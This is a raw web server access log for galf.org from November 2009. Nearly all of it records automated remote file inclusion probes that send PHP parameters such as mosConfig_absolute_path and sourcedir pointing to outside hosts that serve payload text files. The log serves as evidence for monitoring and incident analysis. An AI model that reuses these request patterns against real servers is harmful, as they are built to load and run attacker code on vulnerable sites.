114.108.177.238 - - [23/Nov/2009:03:45:02 -0800] "GET /logs//components/errors.php?error=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:03:45:06 -0800] "GET /logs//components/errors.php?error=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:03:45:08 -0800] "GET /logs/access_090622.log%20%20//components/errors.php?error=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:03:45:09 -0800] "GET /components/errors.php?error=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.97.219.4 - - [23/Nov/2009:03:45:19 -0800] "GET /logs/access_090921.log//error.php?dir=http://www.cbnumed.or.kr/bbs///enda-id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:03:45:23 -0800] "GET /components/errors.php?error=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:03:45:23 -0800] "GET /logs//components/errors.php?error=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:03:45:24 -0800] "GET /logs/access_090622.log%20%20//components/errors.php?error=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.186.64.163 - - [23/Nov/2009:03:46:14 -0800] "GET /logs/access_090803.log//com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://cbnumed.or.kr/bbs/enda-id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
195.186.64.163 - - [23/Nov/2009:03:46:46 -0800] "GET /logs/access_090921.log//com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://cbnumed.or.kr/bbs/enda-id1.txt?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.106.208 - - [23/Nov/2009:03:46:54 -0800] "GET /robots.txt HTTP/1.1" 404 - "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:03:47:21 -0800] "GET /logs/access_090921.log%20%20//components/errors.php?error=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:03:47:27 -0800] "GET /logs/access_090921.log%20%20//components/errors.php?error=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:03:47:28 -0800] "GET /logs/access_090921.log%20%20//components/errors.php?error=http://www.cbnumed.or.kr/bbs/zfxid1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.245.220.82 - - [23/Nov/2009:03:48:06 -0800] "GET /logs/access_091102.log%20%20//skin/ggambo7002_board/write.php?dir=http://pastie.org/661597.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.245.220.82 - - [23/Nov/2009:03:48:06 -0800] "GET /logs//skin/ggambo7002_board/write.php?dir=http://pastie.org/661597.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.245.220.82 - - [23/Nov/2009:03:48:06 -0800] "GET /skin/ggambo7002_board/write.php?dir=http://pastie.org/661597.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.0.132.132 - - [23/Nov/2009:03:48:07 -0800] "GET /logs/access_090518.log%20%20/?sourcedir=http://hackernotcracker.fileave.com/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.0.132.132 - - [23/Nov/2009:03:48:07 -0800] "GET /logs/?sourcedir=http://hackernotcracker.fileave.com/zfxid1.txt?? HTTP/1.1" 200 4942 "-" "Mozilla/5.0" "www.galf.org"
124.0.132.132 - - [23/Nov/2009:03:48:07 -0800] "GET /?sourcedir=http://hackernotcracker.fileave.com/zfxid1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
124.0.132.132 - - [23/Nov/2009:03:48:16 -0800] "GET /logs/access_090518.log%20%20/?sourcedir=http://hackernotcracker.fileave.com/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.0.132.132 - - [23/Nov/2009:03:48:16 -0800] "GET /logs/?sourcedir=http://hackernotcracker.fileave.com/zfxid1.txt?? HTTP/1.0" 200 4926 "-" "Mozilla/5.0" "www.galf.org"
124.0.132.132 - - [23/Nov/2009:03:48:16 -0800] "GET /?sourcedir=http://hackernotcracker.fileave.com/zfxid1.txt?? HTTP/1.1" 200 1048 "-" "Mozilla/5.0" "www.galf.org"
216.245.220.82 - - [23/Nov/2009:03:48:27 -0800] "GET /skin/ggambo7002_board/write.php?dir=http://pastie.org/661597.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
216.245.220.82 - - [23/Nov/2009:03:48:27 -0800] "GET /logs//skin/ggambo7002_board/write.php?dir=http://pastie.org/661597.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
216.245.220.82 - - [23/Nov/2009:03:48:27 -0800] "GET /logs/access.log%20%20//skin/ggambo7002_board/write.php?dir=http://pastie.org/661597.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
208.83.209.55 - - [23/Nov/2009:03:48:30 -0800] "GET /logs/access_090803.log//com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.245.220.82 - - [23/Nov/2009:03:48:34 -0800] "GET /skin/ggambo7002_board/write.php?dir=http://pastie.org/661597.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.245.220.82 - - [23/Nov/2009:03:48:34 -0800] "GET /logs/access_091102.log//skin/ggambo7002_board/write.php?dir=http://pastie.org/661597.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.245.220.82 - - [23/Nov/2009:03:48:34 -0800] "GET /logs//skin/ggambo7002_board/write.php?dir=http://pastie.org/661597.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.0.132.132 - - [23/Nov/2009:03:48:35 -0800] "GET /logs/access_090615.log/?sourcedir=http://hackernotcracker.fileave.com/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.0.132.132 - - [23/Nov/2009:03:48:35 -0800] "GET /logs/access_090427.log/?sourcedir=http://hackernotcracker.fileave.com/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.0.132.132 - - [23/Nov/2009:03:48:35 -0800] "GET /logs/access_090420.log/?sourcedir=http://hackernotcracker.fileave.com/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.0.132.132 - - [23/Nov/2009:03:48:35 -0800] "GET /logs/access_090907.log/?sourcedir=http://hackernotcracker.fileave.com/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.0.132.132 - - [23/Nov/2009:03:48:35 -0800] "GET /logs/access_090720.log/?sourcedir=http://hackernotcracker.fileave.com/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.0.132.132 - - [23/Nov/2009:03:48:35 -0800] "GET /logs/access_090504.log/?sourcedir=http://hackernotcracker.fileave.com/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.0.132.132 - - [23/Nov/2009:03:48:35 -0800] "GET /logs/access_090810.log/?sourcedir=http://hackernotcracker.fileave.com/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.83.209.55 - - [23/Nov/2009:03:48:41 -0800] "GET /logs/access_090803.log//com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.83.209.55 - - [23/Nov/2009:03:48:43 -0800] "GET /logs/access_090921.log//com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.83.209.55 - - [23/Nov/2009:03:48:44 -0800] "GET /logs/access_090803.log//com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.245.220.82 - - [23/Nov/2009:03:48:46 -0800] "GET /logs/access.log//skin/ggambo7002_board/write.php?dir=http://pastie.org/661597.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
216.245.220.82 - - [23/Nov/2009:03:48:46 -0800] "GET /logs//skin/ggambo7002_board/write.php?dir=http://pastie.org/661597.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
216.245.220.82 - - [23/Nov/2009:03:48:46 -0800] "GET /skin/ggambo7002_board/write.php?dir=http://pastie.org/661597.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
208.83.209.55 - - [23/Nov/2009:03:48:50 -0800] "GET /logs/access_090803.log//com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.245.220.82 - - [23/Nov/2009:03:48:54 -0800] "GET /logs//skin/ggambo7002_board/write.php?dir=http://pastie.org/661597.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.245.220.82 - - [23/Nov/2009:03:48:54 -0800] "GET /logs/access.log//skin/ggambo7002_board/write.php?dir=http://pastie.org/661597.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.245.220.82 - - [23/Nov/2009:03:48:54 -0800] "GET /skin/ggambo7002_board/write.php?dir=http://pastie.org/661597.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.0.132.132 - - [23/Nov/2009:03:49:00 -0800] "GET /logs/access_090615.log/?sourcedir=http://hackernotcracker.fileave.com/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.0.132.132 - - [23/Nov/2009:03:49:00 -0800] "GET /logs/access_090427.log/?sourcedir=http://hackernotcracker.fileave.com/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.0.132.132 - - [23/Nov/2009:03:49:00 -0800] "GET /logs/access_090420.log/?sourcedir=http://hackernotcracker.fileave.com/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.0.132.132 - - [23/Nov/2009:03:49:00 -0800] "GET /logs/access_090504.log/?sourcedir=http://hackernotcracker.fileave.com/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.0.132.132 - - [23/Nov/2009:03:49:00 -0800] "GET /logs/access_090907.log/?sourcedir=http://hackernotcracker.fileave.com/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.0.132.132 - - [23/Nov/2009:03:49:00 -0800] "GET /logs/access_090720.log/?sourcedir=http://hackernotcracker.fileave.com/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.83.209.55 - - [23/Nov/2009:03:49:09 -0800] "GET /logs/access_090921.log//com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.83.209.55 - - [23/Nov/2009:03:49:11 -0800] "GET /logs/access_090921.log//com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
208.83.209.55 - - [23/Nov/2009:03:49:22 -0800] "GET /logs/access_090921.log//com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://church.co.kr/bbs/include/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.245.220.82 - - [23/Nov/2009:03:49:23 -0800] "GET /logs/access_091102.log//skin/ggambo7002_board/write.php?dir=http://pastie.org/661597.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.245.220.82 - - [23/Nov/2009:03:49:23 -0800] "GET /skin/ggambo7002_board/write.php?dir=http://pastie.org/661597.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.245.220.82 - - [23/Nov/2009:03:49:23 -0800] "GET /logs//skin/ggambo7002_board/write.php?dir=http://pastie.org/661597.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
216.245.220.82 - - [23/Nov/2009:03:49:27 -0800] "GET /logs/access.log//skin/ggambo7002_board/write.php?dir=http://pastie.org/661597.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
216.245.220.82 - - [23/Nov/2009:03:49:27 -0800] "GET /logs//skin/ggambo7002_board/write.php?dir=http://pastie.org/661597.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
216.245.220.82 - - [23/Nov/2009:03:49:27 -0800] "GET /skin/ggambo7002_board/write.php?dir=http://pastie.org/661597.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
124.0.132.132 - - [23/Nov/2009:03:49:30 -0800] "GET /logs/access_090810.log/?sourcedir=http://hackernotcracker.fileave.com/zfxid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
190.97.219.4 - - [23/Nov/2009:03:50:47 -0800] "GET /logs/access_090525.log//error.php?dir=http://www.cbnumed.or.kr/bbs///enda-id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [23/Nov/2009:03:51:52 -0800] "GET /logs/access.log/historytemplate.php?cms[support]=1&cms[tngpath]=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.92.156.53 - - [23/Nov/2009:03:51:52 -0800] "GET /historytemplate.php?cms[support]=1&cms[tngpath]=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.92.156.53 - - [23/Nov/2009:03:51:52 -0800] "GET /logs/historytemplate.php?cms[support]=1&cms[tngpath]=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.92.156.53 - - [23/Nov/2009:03:51:56 -0800] "GET /logs/historytemplate.php?cms[support]=1&cms[tngpath]=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [23/Nov/2009:03:51:56 -0800] "GET /historytemplate.php?cms[support]=1&cms[tngpath]=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [23/Nov/2009:03:51:56 -0800] "GET /logs/access_091102.log/historytemplate.php?cms[support]=1&cms[tngpath]=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.25.16 - - [23/Nov/2009:03:52:56 -0800] "GET /logs/access.log/historytemplate.php?cms[support]=1&cms[tngpath]=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
91.121.25.16 - - [23/Nov/2009:03:52:56 -0800] "GET /historytemplate.php?cms[support]=1&cms[tngpath]=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
91.121.25.16 - - [23/Nov/2009:03:52:56 -0800] "GET /logs/historytemplate.php?cms[support]=1&cms[tngpath]=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
91.121.25.16 - - [23/Nov/2009:03:53:00 -0800] "GET /logs/access_091102.log/historytemplate.php?cms[support]=1&cms[tngpath]=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.25.16 - - [23/Nov/2009:03:53:00 -0800] "GET /logs/historytemplate.php?cms[support]=1&cms[tngpath]=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.25.16 - - [23/Nov/2009:03:53:00 -0800] "GET /historytemplate.php?cms[support]=1&cms[tngpath]=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [23/Nov/2009:03:53:19 -0800] "GET /logs/access.log%20%20/historytemplate.php?cms[support]=1&cms[tngpath]=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
209.92.156.53 - - [23/Nov/2009:03:53:24 -0800] "GET /logs/access_091102.log%20%20/historytemplate.php?cms[support]=1&cms[tngpath]=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
91.121.25.16 - - [23/Nov/2009:03:54:30 -0800] "GET /logs/access.log%20%20/historytemplate.php?cms[support]=1&cms[tngpath]=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
91.121.25.16 - - [23/Nov/2009:03:54:33 -0800] "GET /logs/access_091102.log%20%20/historytemplate.php?cms[support]=1&cms[tngpath]=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.133.46 - - [23/Nov/2009:03:56:03 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://eindiaart.com//artistimage/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.133.46 - - [23/Nov/2009:03:56:03 -0800] "GET /logs/access_090608.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://eindiaart.com//artistimage/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.133.46 - - [23/Nov/2009:03:56:03 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://eindiaart.com//artistimage/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.133.46 - - [23/Nov/2009:03:56:08 -0800] "GET /logs/access_090615.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://eindiaart.com//artistimage/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.133.46 - - [23/Nov/2009:03:56:09 -0800] "GET /logs/access_090622.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://eindiaart.com//artistimage/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.133.46 - - [23/Nov/2009:03:56:11 -0800] "GET /logs/access_090608.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://eindiaart.com//artistimage/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.133.46 - - [23/Nov/2009:03:56:11 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://eindiaart.com//artistimage/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.133.46 - - [23/Nov/2009:03:56:12 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://eindiaart.com//artistimage/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.133.46 - - [23/Nov/2009:03:56:13 -0800] "GET /logs/access_090601.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://eindiaart.com//artistimage/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.133.46 - - [23/Nov/2009:03:56:15 -0800] "GET /logs/access_090615.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://eindiaart.com//artistimage/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.133.46 - - [23/Nov/2009:03:56:17 -0800] "GET /logs/access_090622.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://eindiaart.com//artistimage/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.15.75 - - [23/Nov/2009:03:56:18 -0800] "GET /logs/access_090803.log/main.php?_shop_path=http://hcmdmc.com/bbs/icon/private_icon/3/content/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.15.75 - - [23/Nov/2009:03:56:18 -0800] "GET /main.php?_shop_path=http://hcmdmc.com/bbs/icon/private_icon/3/content/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
218.38.15.75 - - [23/Nov/2009:03:56:18 -0800] "GET /logs/main.php?_shop_path=http://hcmdmc.com/bbs/icon/private_icon/3/content/pid.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.133.46 - - [23/Nov/2009:03:56:19 -0800] "GET /logs/access_090601.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://eindiaart.com//artistimage/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.133.46 - - [23/Nov/2009:03:56:21 -0800] "GET /logs/access_090817.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://eindiaart.com//artistimage/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.133.46 - - [23/Nov/2009:03:56:22 -0800] "GET /logs/access_091012.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://eindiaart.com//artistimage/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.133.46 - - [23/Nov/2009:03:56:28 -0800] "GET /logs/access_090817.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://eindiaart.com//artistimage/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.133.46 - - [23/Nov/2009:03:56:29 -0800] "GET /logs/access_091012.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://eindiaart.com//artistimage/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.133.46 - - [23/Nov/2009:03:56:41 -0800] "GET /logs/access_090504.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://eindiaart.com//artistimage/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.133.46 - - [23/Nov/2009:03:56:44 -0800] "GET /logs/access_090810.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://eindiaart.com//artistimage/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.133.46 - - [23/Nov/2009:03:56:46 -0800] "GET /logs/access_090504.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://eindiaart.com//artistimage/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.133.46 - - [23/Nov/2009:03:56:50 -0800] "GET /logs/access_090713.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://eindiaart.com//artistimage/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.133.46 - - [23/Nov/2009:03:56:53 -0800] "GET /logs/access_090713.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://eindiaart.com//artistimage/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.133.46 - - [23/Nov/2009:03:56:53 -0800] "GET /logs/access_090525.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://eindiaart.com//artistimage/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:03:56:54 -0800] "GET /logs/access_090817.log//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.cbnumed.or.kr/bbs/enda-id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.133.46 - - [23/Nov/2009:03:56:54 -0800] "GET /logs/access_090928.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://eindiaart.com//artistimage/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:03:56:55 -0800] "GET /administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.cbnumed.or.kr/bbs/enda-id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.133.46 - - [23/Nov/2009:03:56:55 -0800] "GET /logs/access_090525.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://eindiaart.com//artistimage/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:03:56:55 -0800] "GET /logs//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.cbnumed.or.kr/bbs/enda-id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
114.108.177.238 - - [23/Nov/2009:03:56:56 -0800] "GET /logs/access_090824.log//administrator/com_lurm_constructor/admin.lurm_constructor.php?lm_absolute_path=http://www.cbnumed.or.kr/bbs/enda-id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.133.46 - - [23/Nov/2009:03:57:00 -0800] "GET /logs/access_091005.log//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://eindiaart.com//artistimage/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.133.46 - - [23/Nov/2009:03:57:02 -0800] "GET /logs/access_090928.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://eindiaart.com//artistimage/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.133.46 - - [23/Nov/2009:03:57:05 -0800] "GET /logs/access_091005.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://eindiaart.com//artistimage/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
209.92.156.53 - - [23/Nov/2009:03:57:49 -0800] "GET /logs/access.log/historytemplate.php?cms[support]=1&cms[tngpath]=http://hasslefreetours.co.za/wp-content/uploads/2008/01/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.133.46 - - [23/Nov/2009:03:58:04 -0800] "GET /logs/access_091019.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://eindiaart.com//artistimage/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
72.55.133.46 - - [23/Nov/2009:03:58:19 -0800] "GET /components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://eindiaart.com//artistimage/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.133.46 - - [23/Nov/2009:03:58:19 -0800] "GET /logs/access.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://eindiaart.com//artistimage/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.133.46 - - [23/Nov/2009:03:58:19 -0800] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://eindiaart.com//artistimage/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
72.55.133.46 - - [23/Nov/2009:03:58:29 -0800] "GET /logs/access_090831.log%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://eindiaart.com//artistimage/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
